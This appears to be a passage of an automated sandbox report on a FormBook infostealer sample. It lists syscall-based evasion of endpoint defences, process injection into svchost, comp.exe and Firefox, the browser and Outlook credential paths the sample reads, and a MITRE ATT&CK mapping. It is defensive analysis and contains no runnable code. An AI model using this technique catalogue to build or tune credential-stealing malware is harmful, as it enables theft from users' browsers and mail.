Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]	2_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]	2_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]	2_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]	2_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03BBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]	2_2_03B649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03BFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03BC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]	2_2_03C04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]	2_2_03BB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]	2_2_03BC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]	2_2_03BBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]	2_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]	2_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]	2_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]	2_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]	2_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]	2_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]	2_2_03BBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]	2_2_03BB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]	2_2_03C008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]	2_2_03BBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]	2_2_03B30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03BFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03B5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]	2_2_03B52835

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_00F580A9

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_00F2A155
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F2A124 SetUnhandledExceptionFilter,		0_2_00F2A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\comp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\comp.exe

Thread register set: target process: 4836

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\comp.exe

Thread APC queued: target process: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FBD008

Jump to behavior

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F587B1 LogonUserW,

0_2_00F587B1

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00F03B3A

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00F048D7

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F64C7F mouse_event,

0_2_00F64C7F

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\EIvidclKOb.exe"	Jump to behavior
Source: C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe	Process created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F57CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00F57CAF

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F5874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00F5874B

Source: EIvidclKOb.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: HMKEBhehjTFHSE.exe, 00000004.00000000.2406243187.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960472176.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3960746198.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: EIvidclKOb.exe, HMKEBhehjTFHSE.exe, 00000004.00000000.2406243187.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960472176.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3960746198.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: HMKEBhehjTFHSE.exe, 00000004.00000000.2406243187.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960472176.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3960746198.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: HMKEBhehjTFHSE.exe, 00000004.00000000.2406243187.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000004.00000002.3960472176.0000000000DC1000.00000002.00000001.00040000.00000000.sdmp, HMKEBhehjTFHSE.exe, 00000007.00000002.3960746198.0000000001B51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F2862B cpuid

0_2_00F2862B

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F34E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F34E87

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F41E06 GetUserNameW,

0_2_00F41E06

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F33F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00F33F3A

Source: C:\Users\user\Desktop\EIvidclKOb.exe

Code function: 0_2_00F049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00F049A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3960892293.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482909431.0000000003A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482512715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3960832005.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3959727235.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3962348656.0000000005900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3960869459.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2483416999.0000000004950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\comp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\comp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: EIvidclKOb.exe	Binary or memory string: WIN_81
Source: EIvidclKOb.exe	Binary or memory string: WIN_XP
Source: EIvidclKOb.exe	Binary or memory string: WIN_XPe
Source: EIvidclKOb.exe	Binary or memory string: WIN_VISTA
Source: EIvidclKOb.exe	Binary or memory string: WIN_7
Source: EIvidclKOb.exe	Binary or memory string: WIN_8
Source: EIvidclKOb.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3960892293.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482909431.0000000003A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2482512715.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3960832005.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3959727235.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3962348656.0000000005900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3960869459.0000000002E80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2483416999.0000000004950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00F76283
Source: C:\Users\user\Desktop\EIvidclKOb.exe	Code function: 0_2_00F76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00F76747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
